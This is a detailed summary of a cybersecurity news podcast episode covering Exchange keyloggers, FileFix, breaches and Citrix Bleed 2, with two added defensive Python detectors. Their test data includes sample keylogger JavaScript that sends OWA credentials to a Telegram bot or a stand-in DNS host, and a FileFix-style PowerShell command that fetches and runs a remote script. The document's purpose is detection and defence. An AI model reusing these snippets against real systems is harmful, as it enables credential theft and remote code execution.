Detailed Summary of "Cyber Security Headlines" Episode 70 by CISO Series
Release Date: June 25, 2025
Host: Sarah Lane
1. Microsoft Exchange Servers Targeted by Keyloggers
Lane opens the episode with a campaign in which more than 70 publicly exposed Microsoft Exchange servers have been compromised by as-yet unidentified attackers. The intruders inject JavaScript keyloggers into the Outlook Web Access login page so that credentials are captured at the moment a user types them in. Lane reports:
"Unidentified attackers are targeting over 70 publicly exposed Microsoft Exchange servers by injecting JavaScript-based keyloggers into login pages to steal credentials." [00:07]
The campaign, documented by Positive Technologies, spans 26 countries, with some compromises dating back to 2021. Initial access relies on long-patched Exchange flaws, chiefly ProxyShell and ProxyLogon, so the affected servers are ones that were never updated. Exfiltration varies across the samples: some keyloggers write stolen data to a local file on the server, others send it to a Telegram bot, and others encode it into DNS queries, which makes a single network signature unreliable for detection. Credentials are handled in plain text throughout. For defenders the practical checks are the obvious ones: confirm the 2021 Exchange patches are actually applied, and compare the files behind the login page (logon.aspx and the scripts it loads) against a known-good copy or the installation media, since any extra inline script on that page is a strong indicator of this tampering.
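A concrete version of that login-page integrity check, written for this summary as an added example (it is not code from the episode or from Positive Technologies): it parses the HTML of an OWA logon page, collects every script tag, and flags inline scripts that both read the credential fields and contain a way to move data off the page (fetch, XMLHttpRequest, an Image beacon), or external script sources outside an allow-list of the organisation's own hosts. The sample pages and the host name mail.example.com are constructed for the example; the indicator patterns are heuristics, not a signature of the real campaign.

```python
"""Heuristic scan of an Exchange OWA logon page for injected keylogger script.

Added example, not part of the episode or the Positive Technologies report.
Assumes the operator can read the logon page HTML from disk (or fetch it
from the server) and knows which hosts legitimately serve OWA scripts.
"""
import re
from html.parser import HTMLParser

# Inline script that touches the login form fields.
CREDENTIAL_REFS = re.compile(r"(password|passwd|pwd|username|\bpass\b)", re.I)
# Browser-side primitives a keylogger needs to get data out of the page.
NETWORK_PRIMITIVES = re.compile(
    r"(fetch\s*\(|XMLHttpRequest|navigator\.sendBeacon|new\s+Image\s*\(|\.src\s*=)", re.I)
EXTERNAL_URL = re.compile(r"https?://([a-z0-9.-]+)", re.I)


class _ScriptCollector(HTMLParser):
    """Collect (src, inline body) for every <script> on the page."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self.scripts.append([dict(attrs).get("src"), ""])

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data as raw text.
        if self._in_script:
            self.scripts[-1][1] += data


def find_suspicious_scripts(html, own_hosts):
    """Return human-readable findings for scripts that look like a credential stealer."""
    own_hosts = {h.lower() for h in own_hosts}
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src is not None:
            m = EXTERNAL_URL.match(src)
            if m and m.group(1).lower() not in own_hosts:
                findings.append(f"external script loaded from {m.group(1)}")
            continue  # same-origin script files are checked by file hash elsewhere
        reads_creds = bool(CREDENTIAL_REFS.search(body))
        exfil = bool(NETWORK_PRIMITIVES.search(body))
        hosts = {h.lower() for h in EXTERNAL_URL.findall(body)} - own_hosts
        if reads_creds and (exfil or hosts):
            target = ", ".join(sorted(hosts)) if hosts else "a dynamically built or same-origin target"
            findings.append(f"inline script reads credential fields and sends data to {target}")
    return findings


# --- constructed sample pages (not real captures) ---
OWN_HOSTS = {"mail.example.com"}

CLEAN_PAGE = """<html><body>
<form action="/owa/auth.owa" method="post">
<input id="username" name="username">
<input id="password" name="password" type="password">
</form>
<script src="/owa/auth/15.2/scripts/logon.js"></script>
<script src="https://mail.example.com/owa/auth/15.2/scripts/flogon.js"></script>
<script>
  // legitimate helper: reads the field name but never sends anything
  document.getElementById("username").focus();
</script>
</body></html>"""

# Variant 1: form-submit hook that posts the credentials to a Telegram bot.
TELEGRAM_PAGE = CLEAN_PAGE.replace("</body>", """<script>
document.forms[0].addEventListener("submit", function () {
  var u = document.getElementById("username").value;
  var p = document.getElementById("password").value;
  fetch("https://api.telegram.org/bot000:placeholder/sendMessage?chat_id=1&text=" + encodeURIComponent(u + ":" + p));
});
</script></body>""")

# Variant 2: DNS-style exfiltration, the password becomes a subdomain label so no
# literal host appears in the script.
DNS_PAGE = CLEAN_PAGE.replace("</body>", """<script>
document.forms[0].onsubmit = function () {
  var p = document.getElementById("password").value;
  var label = btoa(p).replace(/=/g, "");
  new Image().src = "https://" + label + ".exfil.example/1.gif";
};
</script></body>""")

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("telegram", TELEGRAM_PAGE), ("dns", DNS_PAGE)]:
        print(name, find_suspicious_scripts(page, OWN_HOSTS))
```

The clean page is not flagged even though its helper script mentions the username field, because nothing on it moves data anywhere; the two injected variants are flagged on the combination of reading the fields and having an exfiltration primitive, which also catches the DNS variant where the attacker's host never appears as a literal. Same-origin script files are skipped here and should be compared against known-good hashes instead, since a local-file keylogger can equally be planted in an existing .js file.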
2. Apple, Netflix, and Microsoft Sites Hacked for Tech Support Scams
Lane then turns to a tech support scam that piggybacks on major brands. Scammers buy Google Ads that point at genuine support pages on apple.com, microsoft.com and netflix.com, but with a manipulated query string: the legitimate page reflects the search term back into its own content, so a query containing a fake support number makes the real site display the scammer's phone number. Because the domain is genuine, neither the user nor a simple URL check sees anything wrong. Lane explains:
"Instead of spoofing websites, the attackers link to real support Pages with manipulated URLs that show scammer numbers in search results, tricking users into calling them." [00:07]
Once a victim calls, the scammers work toward the usual goals: personal data, payment details, or remote access to the victim's machine. The lesson for site owners is that reflecting unsanitised search input into prominent page content is a content-injection problem even when it is not an XSS problem; for users, a phone number that appears only in a search-results box rather than on the vendor's contact page should be treated as untrusted.
3. Cloudflare, CrowdStrike, and Ping Identity Conclude Critical Infrastructure Defense Project
The episode also notes the end of a free defensive offering. Cloudflare, CrowdStrike and Ping Identity have shut down their Critical Infrastructure Defense Project, launched in 2022 to give sectors such as healthcare and utilities free access to their products in the face of Russia-linked cyber threats. Lane notes:
"Cloudflare, CrowdStrike and Ping Identity have ended their free critical infrastructure defense project, originally launched in 2022 to protect sectors like health care and utilities from Russia linked cyber threats." [00:07]
The timing is awkward: the shutdown coincides with a Department of Homeland Security (DHS) warning that Iranian hackers may retaliate against U.S. networks following the recent U.S. strikes on Iran's nuclear sites. The accompanying National Terrorism Advisory System (NTAS) bulletin warns of both cyber and physical attacks by Iranian-aligned actors and extremist groups, so organisations in those sectors lose a free layer of protection at the moment the threat picture is shifting.
4. File Fix Attack: Weaponizing Windows File Explorer for Stealthy Commands
Lane describes a new social-engineering technique called FileFix, a variant of the ClickFix attacks. Where ClickFix coaxes the victim into pasting a command into the Windows Run dialog, FileFix has the victim paste it into the address bar of Windows File Explorer, which will execute it just the same. The pasted string is dressed up to look like an ordinary file path, so a user who glances at the address bar sees a path rather than a PowerShell command. Lane elaborates:
"FileFix uses a familiar UI and disguises the command behind a fake file path, likely to be adopted by threat actors due to simplicity and ability to evade detection." [00:07]
The technique needs no exploit and no file drop, just a web page with a "copy" button and a plausible instruction, and because File Explorer is the parent process rather than the Run dialog, existing ClickFix detections keyed on that lineage will miss it. Detection therefore has to look at what Explorer spawns: a PowerShell or cmd process whose parent is explorer.exe and whose command line carries a decoy path or hidden-window switches.
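A detection rule for that lineage, added here as an example and not taken from the episode or from the original FileFix research: it runs over constructed process-creation events in roughly the shape of Sysmon Event ID 1 and flags shells spawned by explorer.exe whose command line carries a padded decoy path or hidden-window/encoded-command switches. The assumption that the decoy is a long run of spaces followed by a comment marker and a Windows path comes from how the technique is publicly described; the page itself only says the command is disguised behind a fake file path. Process names, paths and PIDs in the sample events are constructed.

```python
"""Flag FileFix-style launches: explorer.exe spawning a shell with a decoy path.

Added example, not part of the episode. Input is a list of dicts with the
Sysmon Event ID 1 field names (Image, ParentImage, CommandLine, ProcessId).
Assumption: the pasted text is '<command>' + padding + '# <decoy path>'.
"""
import re

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# A comment marker or a long whitespace run, then something that looks like a drive path.
DECOY = re.compile(r"(#|\s{8,})\s*[A-Za-z]:\\[^\s\"']+")

# Switches and cmdlets that almost never appear in a command a user launched by hand.
PAYLOAD = re.compile(
    r"(-enc\b|-encodedcommand|\biex\b|invoke-expression|downloadstring|"
    r"invoke-webrequest|-w(indowstyle)?\s+hidden)", re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a reason string if the event looks like FileFix, else None."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent != "explorer.exe" or child not in SHELLS:
        return None  # rule is scoped to the Explorer address-bar lineage
    decoy = DECOY.search(cmd)
    payload = PAYLOAD.search(cmd)
    if decoy and payload:
        return "decoy path after shell command: " + decoy.group(0).strip()
    if decoy:
        return "shell launched from Explorer with padded decoy path"
    if payload:
        return "shell launched from Explorer with suspicious switches: " + payload.group(0)
    return None


def scan_events(events):
    """Return [(ProcessId, reason)] for every event the rule fires on."""
    hits = []
    for ev in events:
        reason = classify(ev)
        if reason:
            hits.append((ev["ProcessId"], reason))
    return hits


# --- constructed sample events (not real telemetry) ---
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    # User opened PowerShell from a folder: Explorer parent, but no payload or decoy.
    {"ProcessId": 3120, "Image": PS, "ParentImage": EXPLORER, "CommandLine": f'"{PS}"'},
    # FileFix: real command, 40 spaces of padding, then a fake internal document path.
    {"ProcessId": 4412, "Image": PS, "ParentImage": EXPLORER,
     "CommandLine": r'powershell.exe -w hidden -c "iex (iwr https://update.example/s.ps1)"'
                    + " " * 40 + r"# C:\company\internal-secure\invoice.pdf"},
    # Ordinary cmd from Explorer.
    {"ProcessId": 5001, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": EXPLORER,
     "CommandLine": "cmd.exe /c dir"},
    # Encoded command, but parent is cmd.exe: outside this rule's scope (ClickFix-style rules cover it).
    {"ProcessId": 5210, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -enc SQBFAFgA"},
]

if __name__ == "__main__":
    for pid, reason in scan_events(SAMPLE_EVENTS):
        print(pid, reason)
```

Only the padded decoy event fires. The rule deliberately ignores the encoded-command launch whose parent is cmd.exe so that it complements rather than duplicates an existing ClickFix rule; in production the two would usually be combined, and the decoy regex should be tuned against a baseline of what Explorer legitimately spawns in the environment.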
5. Aflac Suffers Data Breach Exposing Sensitive Customer Information
Among the breaches discussed is the one at Aflac, one of the largest U.S. insurers, which is investigating an intrusion that may have exposed Social Security numbers, health data and other sensitive customer information. Lane reports:
"Aflac, one of the largest US insurers, is investigating a data breach that may have exposed Social Security numbers, health data and other sensitive customer information." [00:07]
The intrusion is attributed to Scattered Spider, whose playbook is low-tech social engineering: impersonating employees to the help desk, phishing, SIM swapping and MFA fatigue (push bombing) rather than zero-days or custom malware. The group is routinely described as highly sophisticated, but the sophistication is in the social engineering, not the tooling, which is why the controls that matter are help-desk identity verification before password or MFA resets and phishing-resistant MFA rather than push approvals.
6. Russian Court Sentences REvil Ransomware Members Amidst Cybersecurity Tensions
A Russian court has sentenced four members of the REvil ransomware group for trafficking stolen U.S. payment card data, then released them immediately, counting the time already served in pretrial detention. Lane provides context:
"A Russian court sentenced four REvil ransomware members for trafficking stolen U.S. payment card data, but released them immediately, citing time served in pretrial detention." [00:07]
The case matters mainly as one of the rare occasions on which Russia has prosecuted its own hackers at all; the arrests trace back to U.S. pressure in 2021. The charges concerned card fraud only and were never tied to REvil's major ransomware operations, so the outcome says little about accountability for the group's better-known attacks.
7. Threat Actors Trojanize SonicWall Net Extender VPN App to Steal Credentials
The episode also warns of a trojanized build of SonicWall's NetExtender SSL VPN client. A threat actor has been distributing a modified installer that steals the user's credentials and VPN configuration data when the client is used. Lane explains:
"A threat actor distributed a trojanized version of SonicWall's NetExtender VPN app designed to steal user credentials and VPN configuration data." [00:07]
The malicious installer was digitally signed, but by a certificate belonging to an unrelated company rather than SonicWall, and was hosted on attacker-controlled sites that catch users searching for the client. SonicWall and Microsoft have responded by revoking the certificate and adding detections, and SonicWall reminds users to download NetExtender only from its official sites. The practical check before installing any VPN client is to inspect the Authenticode signature and confirm the signer is the vendor, not merely that the file is signed.
8. Citrix Bleed 2 Vulnerability Poses Significant Security Risks
Closing the episode, Lane covers a newly patched critical vulnerability in NetScaler ADC and NetScaler Gateway, tracked as CVE-2025-5777 and dubbed Citrix Bleed 2. It is an out-of-bounds memory read that lets an unauthenticated attacker pull sensitive memory contents, including session tokens, from the appliance. She states:
"Citrix has patched a critical vulnerability dubbed Citrix Bleed 2, affecting NetScaler ADC and Gateway products, which could allow unauthenticated attackers to access sensitive memory data like session tokens." [00:07]
The bug closely mirrors the original Citrix Bleed (CVE-2023-4966), which ransomware groups exploited widely to hijack authenticated sessions, and researchers expect the same pattern here. Patching alone does not evict an attacker who has already stolen a token, so Citrix's advisory also calls for terminating all active ICA and PCoIP sessions after the upgrade (the kill icaconnection and kill pcoipConnection commands on the appliance). The CVE description has since been revised to reflect a larger attack surface than first disclosed, which is one more reason to treat exposed appliances as urgent.
That covers the headlines from this episode of Cyber Security Headlines by the CISO Series. For the full discussion of each story and ongoing coverage, listeners are encouraged to visit CISOseries.com.
